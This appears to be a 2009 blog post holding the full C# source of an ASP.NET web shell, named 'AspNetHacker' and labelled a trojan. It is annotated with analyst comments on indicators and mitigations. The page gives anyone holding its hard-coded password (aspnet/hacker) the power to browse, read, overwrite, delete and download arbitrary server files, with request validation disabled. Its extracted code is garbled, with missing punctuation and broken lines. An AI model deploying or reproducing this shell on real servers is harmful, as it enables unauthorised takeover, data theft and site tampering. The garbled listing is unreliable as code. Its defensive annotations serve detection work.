
 

<%@ Page Language="C#" Debug="true" ValidateRequest="false"%>
<%@ Import Namespace="System.IO" %>
<script runat="server">
    
// Analysis note: this inline-script page is a file-manager web shell; its own footer
// text labels it "AspNet木马" ("AspNet trojan"). Static indicators visible in the
// listing: the page title "AspNetHacker", the session key "aspnet", the form fields
// "un" / "pwd" / "ct" / "encoding", and the query-string actions chk / up / del / down / sf.
// The page directive sets ValidateRequest="false", which switches off ASP.NET request
// validation for this page, and Debug="true".
// NOTE(review): the extracted listing has lost some punctuation, so read it as a
// sample for analysis rather than as compilable source.

// Line terminator used when emitting HTML; assigned from Environment.NewLine in Page_Load.
string NewLine;
    
// Directory being browsed; filled from the "path" query-string value in Page_Load.
string NowPath = "";
    
// File being acted on; filled from the "file" query-string value, or from the "file"
// form field when the action is "up".
string NowFile = "";
    
// Page entry point: writes the HTML header, runs the login check when action is "chk",
// reads the target directory and file from the request, then dispatches on the action.
// Security-relevant behaviour visible here:
//  - "path" and "file" come straight from the request and are handed to System.IO calls
//    in the helpers with no restriction to the site directory, so the reach is whatever
//    the worker-process account can read or write. Least-privilege application-pool
//    identities and read-only content directories limit that reach.
//  - The session check below is the only access control; an unauthenticated request
//    stops there only because ShowFooter() ends the response.
//  - For "del", "down" and "sf" the action and the target path travel in the query
//    string, so they show up in web-server access logs when the URI query is logged;
//    for "up" the file name and content arrive in the POST body instead.
protected void Page_Load(object sender, EventArgs e)
    {
        NewLine 
= Environment.NewLine;
        ShowHeader();
        
string Action = Request.QueryString["action"];
        
// The login attempt is processed before the session gate further down.
if (Action == "chk")
        {
            ChkUser(); 
        }
        NowPath 
=HttpUtility.UrlDecode( Request.QueryString["path"+ "");
        NowFile 
= HttpUtility.UrlDecode(Request.QueryString["file"+ "");        
        
// Session gate: anything without the expected session value gets the login form.
if (Session["aspnet"== null || Session["aspnet"].ToString() != "hacker")
        {
            ShowLog();
            // ShowFooter() calls Response.End(), which is what keeps the switch below
            // from running for an unauthenticated request.
            ShowFooter();
        }
        
switch (Action)
        {
            
case "up":
                NowFile 
= HttpUtility.UrlDecode(Request.Form["file"+ "");
                UpFile();
                
break;
            
case "del":
                DelFile();
                
break;
            
case "down":
                DownLoadFile();
                
break;
            
// "sf" renders the edit form; its ShowFooter() ends the response, so the
// directory listing below is not emitted for this action.
case "sf":
                ShowFileInfo();
                ShowFooter();
                
break;
        }
        ShowDictionarys();
        ShowFooter();
    }
    
// Deletes the file named by NowFile when it exists; does nothing when it does not.
// The path is the request-supplied value with no check that it lies inside the site,
// so any file the worker-process account may delete is in scope. File-integrity
// monitoring on web content and a content directory the application pool cannot write
// to are the controls that catch or block this.
// On failure the exception message is concatenated, unencoded, into an inline script
// alert and the response is ended.
private void DelFile()
    {
        
if (File.Exists(NowFile))
        {
            
try
            {
                File.Delete(NowFile);
            }
            
catch (Exception e)
            {
                Response.Write(
"<script>alert('删除失败:"+e.Message+"!');history.back();</" + "script>");
                Response.End();
            }
        } 
    }
    
// Renders an edit form for NowFile: a hidden "file" field, a hidden "encoding" field
// holding the detected code page, and a textarea "ct" filled with the file's text.
// The form posts to ?action=up, which is handled by UpFile().
// Points a reviewer should note:
//  - The file content is written into the page without HTML encoding.
//  - This is an arbitrary-file read: NowFile is the request-supplied path.
//  - The stream and reader are closed only on the success path; an exception between
//    File.Open and Close() leaves the handle to the garbage collector.
// On failure, or when the file does not exist, an alert is written and the response ends.
private void ShowFileInfo()
    {
        
if (File.Exists(NowFile))
        {
            
try
            {
                Response.Write(
"<div align='center'><form method='post' action='?action=up&path="+HttpUtility.UrlEncode(NowPath)+"'>");
                Response.Write(
"<input type='hidden' value='" + HttpUtility.UrlEncode(NowFile) + "' name='file'/>");  
                Stream s 
= File.Open(NowFile, FileMode.Open, FileAccess.Read);
                Encoding encoding 
= GetFileEncoding(s);// detect the file's encoding
                Response.Write("<input type='hidden' value='"+encoding.CodePage+"' name='encoding'/>");                
                // Rewind: GetFileEncoding consumed the first bytes while sniffing the BOM.
                s.Position 
= 0;
                Response.Write(
"<textarea name='ct' style='width:650px;height=500px'>");
                StreamReader sr 
= new StreamReader(s, encoding);
                Response.Write(sr.ReadToEnd());
                sr.Close();
                s.Close();
                Response.Write(
"</textarea><br/><input type='submit' value='修改'/></form></div>"); 
            }
            
catch (Exception e)
            {
                Response.Write(
"<script>alert('读取失败:" + e.Message + "!');history.back();</" + "script>");
                Response.End();
            }
        } 
        
else
        {
            Response.Write(
"<script>alert('文件不存在!');history.back();</" + "script>");
            Response.End();
        }
    }
    
// Overwrites NowFile with the posted "ct" form value, using the code page posted in
// the "encoding" form field. Only existing files are written (File.Exists gate), and
// the StreamWriter is opened with append = false, so the previous content is replaced.
// Defender's view: this is the tampering primitive of the page. Because the page
// directive disables request validation, posted markup is not rejected by ASP.NET.
// Unexpected modification times on site files and POST requests carrying action=up
// in the query string are the traces it leaves.
// int.Parse / GetEncoding failures fall into the catch, which reports the exception
// message in an alert and ends the response.
private void UpFile()
    {
        
if (File.Exists(NowFile))
        {
            
try
            {
                Encoding encoding 
= Encoding.GetEncoding(int.Parse(Request.Form["encoding"]));
                StreamWriter sw 
= new StreamWriter(NowFile, false, encoding);
                sw.Write(Request.Form[
"ct"]);
                sw.Close();
                Response.Write(
"<script>alert('保存成功!');</" + "script>");
            }
            
catch (Exception e)
            {
                Response.Write(
"<script>alert('保存失败:" + e.Message + "!');history.back();</" + "script>");
                Response.End();
            }
        }
        
else
        {
            Response.Write(
"<script>alert('文件不存在!');history.back();</" + "script>");
            Response.End();
        }
    }
    
// Sends NowFile to the client as an attachment, choosing a Content-Type from the
// file extension. The path is the request-supplied value, so this is an arbitrary-file
// read limited only by the worker-process account's permissions.
// Details visible in the code:
//  - The extension is not lower-cased here (ShowFiles does lower-case it), so an
//    upper-case extension falls through to the default "application/octet-stream".
//  - "htm" is mapped to "text/htm", which is not the registered type (text/html).
//  - The file name is placed in the Content-Disposition header without escaping.
// Defender's view: responses from an unexpected .aspx that carry
// Content-Disposition: attachment, together with action=down&file= in the logged
// query string, are the network and log traces of this routine.
private void DownLoadFile()
    {
        
if (File.Exists(NowFile))
        {
            
try
            {
                
string Ext = Path.GetExtension(NowFile).Replace(".""");
                
string Name = Path.GetFileName(NowFile);
                
string Mime = "";
                
switch (Ext)
                { 
                    
case "jpg":
                        Mime 
= "image/" + Ext;
                        
break;
                    
case "png":
                        Mime 
= "image/" + Ext;
                        
break;
                    
case "gif":
                        Mime 
= "image/" + Ext;
                        
break;
                    
case "bmp":
                        Mime 
= "application/x-MS-bmp";
                        
break;
                    
case "ico":
                        Mime 
= "application/octet-stream";
                        
break;
                    
case "rar":
                        Mime 
= "application/x-rar-compressed";
                        
break;
                    
case "html":
                        Mime 
= "text/html";
                        
break;
                    
case "htm":
                        Mime 
= "text/htm";
                        
break;
                    
// Server-side script sources are returned as plain text.
case "asp":
                        Mime 
= "text/plain";
                        
break;
                    
case "aspx":
                        Mime 
= "text/plain";
                        
break;
                    
case "jsp":
                        Mime 
= "text/plain";
                        
break;
                    
case "php":
                        Mime 
= "text/plain";
                        
break;
                    
case "do":
                        Mime 
= "text/plain";
                        
break;   
                    
case "txt":
                        Mime 
= "text/plain";
                        
break;
                    
default:
                        Mime 
= "application/octet-stream";
                        
break;
                }
                // Discard the HTML header already written by ShowHeader() before sending the file.
                Response.Clear();
                Response.ContentType 
= Mime;
                Response.AddHeader(
"Content-Disposition""attachment;filename=\"" + Name + "\"");
                Response.WriteFile(NowFile);
                Response.Flush();
            }
            
catch (Exception e)
            {
                Response.Write(
"<script>alert('文件下载失败:"+e.Message+"!');self.close();</" + "script>");
                Response.End();
            } 
        }
        
else
        {
            Response.Write(
"<script>alert('文件不存在!');self.close();</" + "script>");
            Response.End();
        }
    }
    
// Login check: compares the posted "un" and "pwd" form fields with string literals
// embedded in the page and, on a match, stores a marker value in the session under
// the key "aspnet". Any other input produces an alert and ends the response.
// Defender's view: the credentials are hard-coded in plaintext, so the literals in
// this method, together with the page title and footer text, are stable strings for
// content scanning of web directories. Anyone who can read the file can log in.
private void ChkUser()
    {
        
if (Request.Form["un"== "aspnet" && Request.Form["pwd"== "hacker")
        {
            Session[
"aspnet"= "hacker";            
        }
        
else
        {
            Response.Write(
"<script>alert('用户名或者密码出错!');history.back();</"+"script>");
            Response.End();
        }
    }
    
// Emits the opening or closing markup of the outer listing table.
// IsHeader == true : writes the client-side helpers Reload, DelConfirm and DownLoad,
//                    then opens the table and its first row.
// IsHeader == false: closes the row and the table.
// The helpers build URLs of the form ?path=, ?action=del&path=...&file= and
// ?action=down&file=, i.e. delete and download are issued as GET requests, which is
// why they are visible in access logs that record the URI query.
private void ShowTable(bool IsHeader)
    {
        
if (IsHeader)
        {
            Response.Write(NewLine
+"<script>function Reload(path){window.location='?path='+path;}"+NewLine
                
+ "function DelConfirm(path,file){if(confirm('确认删除!?')){window.location='?action=del&path='+path+'&file='+file;}}" + NewLine
                
+ "function DownLoad(path){window.open('?action=down&file='+path);}</" + "script>" + NewLine);
            Response.Write(
"<table border='1px' bordercolor='black' style='width:600px;' align='center'><tr>" + NewLine); 
        }
        
else
        {
            Response.Write(
"</tr></table>"); 
        } 
    }
    
// Renders the directory pane: a "parent directory" entry, one entry per
// sub-directory, and then the file pane via ShowFiles().
// When NowPath is empty the listing starts at Server.MapPath(""); otherwise it uses
// the request-supplied NowPath as-is, so any directory the worker-process account can
// enumerate may be listed.
// Points a reviewer should note:
//  - DirectoryInfo.Parent is null for a root directory; the resulting exception is
//    swallowed by the bare catch and reported with the generic "no permission" alert,
//    as is every other failure in this method.
//  - Directory names are written into the page without HTML encoding.
private void ShowDictionarys()
    {
        ShowTable(
true);       
        
try
        {
            
            DirectoryInfo DirInfo;
            
if (NowPath == "")
                DirInfo 
= new DirectoryInfo(Server.MapPath(""));
            
else
                DirInfo 
= new DirectoryInfo(NowPath);
            DirectoryInfo[] Dirs 
= DirInfo.GetDirectories();
            Response.Write(
"<td width='30%' valign='top'>");
            Response.Write(
"<div title='双击返回' ondblclick=\"Reload('" + HttpUtility.UrlEncode(DirInfo.Parent.FullName) + "')\">返回上级目录</div>");
            
foreach (DirectoryInfo d in Dirs)
            {
                Response.Write(
"<div title='双击进入' ondblclick=\"Reload('" + HttpUtility.UrlEncode(d.FullName) + "')\">" + d.Name + "</div>"); 
            }
            Response.Write(
"</td>");
            ShowFiles(DirInfo.GetFiles());                    
        }
        
catch
        {
            Response.Write(
"<script>alert('没有权限访问这个目录!');history.back();</" + "script>");
            Response.End();
        }
    }
    
// Renders the file pane: one table row per entry in Files with a tooltip (type, size
// in KB rounded up, last write time) and the per-file action links, then closes the
// outer table through ShowTable(false).
// Files: the entries to list; the caller passes DirInfo.GetFiles().
// The edit link is omitted for jpg, gif, bmp, ico, png and rar; download and delete
// links are emitted for every file. File names are written without HTML encoding.
private void ShowFiles(FileInfo[] Files)
    {
        Response.Write(
"<td width='70%' valign='top'>");
        Response.Write(
"<table width='100%'>");
        Response.Write(
"<tr><td width='70%'><b>文件名称</b></td><td width='30%' align='center'><b>操作</b></td></tr>");
        Response.Write(
"<tr><td height='2px' colspan='2' style='background-color:black'></td></tr>");
        
string Ext = "";
        
foreach (FileInfo fi in Files)
        {
            // Lower-cased extension without the dot; used for the tooltip and the edit-link test.
            Ext 
= fi.Extension.ToLower().Replace(".""");
            Response.Write(
"<tr><td title=\"类型:" + Ext + NewLine
                + "大小:" + Math.Ceiling((double)fi.Length / (double)1024+ "kb" + NewLine
                
+ "最后修改:" + fi.LastWriteTime.ToString() + "\"><font color='red'>" +fi.Name+
                "</font></td>");                           
            Response.Write(
"<td>");
            
// Binary formats get no edit link.
if (Ext != "jpg" && Ext != "gif" && Ext != "bmp" && Ext != "ico" && Ext != "png"&&Ext!="rar")
                Response.Write(
"<a href='?action=sf&path="+HttpUtility.UrlEncode(NowPath)+
                    
"&file=" + HttpUtility.UrlEncode(fi.FullName) + "'>编辑</a>&nbsp;&nbsp;");
            Response.Write(
"<a href='#' onclick=\"DownLoad('" + HttpUtility.UrlEncode(fi.FullName) + "')\">下载</a>&nbsp;&nbsp;");
            Response.Write(
"<a href='#' onclick=\"DelConfirm('"+HttpUtility.UrlEncode(NowPath)+
                "','"+HttpUtility.UrlEncode( fi.FullName)+"')\">删除</a></td></tr>");   
        }
        Response.Write(
"</table>");
        Response.Write(
"</td>");
        ShowTable(
false);
    }
    
// Guesses a text encoding from the first two bytes of the stream (byte-order mark):
//   239,187 (EF BB) -> Encoding.UTF8
//   255,254 (FF FE) -> Encoding.Unicode
//   254,255 (FE FF) -> Encoding.BigEndianUnicode
// Anything else, or any exception while reading, yields Encoding.Default.
// s: the stream to inspect; the read advances its position and this method does not
//    rewind it.
// The number of bytes returned by Read is not checked, and exceptions are swallowed
// by the empty catch.
private Encoding GetFileEncoding(Stream s)
    {
        Encoding encoding 
= Encoding.Default;
        
try
        {
            
byte[] FirstByte = new byte[2];
            s.Read(FirstByte, 
0, FirstByte.Length);
            
if (FirstByte[0== 239 && FirstByte[1== 187)
                
return Encoding.UTF8;
            
else if (FirstByte[0== 255 && FirstByte[1== 254)
                
return Encoding.Unicode;
            
else if (FirstByte[0== 254 && FirstByte[1== 255)
                
return Encoding.BigEndianUnicode;
        }
        
catch
        { }
        
return encoding;
    }
    
// Writes the opening HTML: html/head, a UTF-8 content-type meta tag, the page title,
// a small style block, and the opening body tag.
// The literal title "AspNetHacker" is returned on every HTML response of this page,
// which makes it a usable string for content scanning and response inspection.
private void ShowHeader()
    {
        Response.Write(
"<html>" + NewLine);
        Response.Write(
"<head>" + NewLine);
        Response.Write(
"<meta http-equiv='content-type'"+
            
" content='text/html;charset=utf-8'/>" + NewLine);
        Response.Write(
"<title>AspNetHacker</title>" + NewLine);
        Response.Write(
"<style>body{font-size:10pt}" + NewLine + "td{font-size:10pt}" + NewLine
            
+ "a{font-size:10pt}" + "</style>");
        Response.Write(
"</head><body>" + NewLine);
    }
    
// Writes the login form: a client-side emptiness check for the two fields and a form
// that posts "un" and "pwd" to ?action=chk, which Page_Load routes to ChkUser().
// The empty-field check runs only in the browser; the server-side comparison is in
// ChkUser(). The closing tags are emitted in the opposite order to the opening tags
// (the div is closed before the form).
private void ShowLog()
    {
        Response.Write(
"<script>function check(f){"+NewLine+"if(f.un.value==''){alert('用户名不能为空!');f.un.focus();return false;}"+
            NewLine
+"if(f.pwd.value==''){alert('密码不能为空!');f.pwd.focus();return false;}}</" + "script>" + NewLine);
        Response.Write(
"<div align='center'><form method='post' action='?action=chk' onsubmit='return check(this)'>"+NewLine);
        Response.Write(
"用户名:<input type='text' name='un' width='200px'/>"
            
+ NewLine + "<br/>密码:<input type='password' name='pwd' width='200px'/><br/>"+NewLine
            
+"<input type='submit' value='提交'/>");
        Response.Write(
"</div></form>");
    }
    
// Writes the closing markup and ends the response.
// Response.End() stops further processing of the request, so code that follows a
// ShowFooter() call in Page_Load does not run; the session gate relies on this.
// The footer literal ("AspNet木马", "AspNet trojan") is a stable string for content
// scanning of web directories.
private void ShowFooter()
    {
        Response.Write(
"<div align='center'>AspNet木马</div></body></html>");
        Response.End();
    }
</script>

 

posted on 2009-07-15 18:09 钱途无梁 阅读(...) 评论(...) 编辑 收藏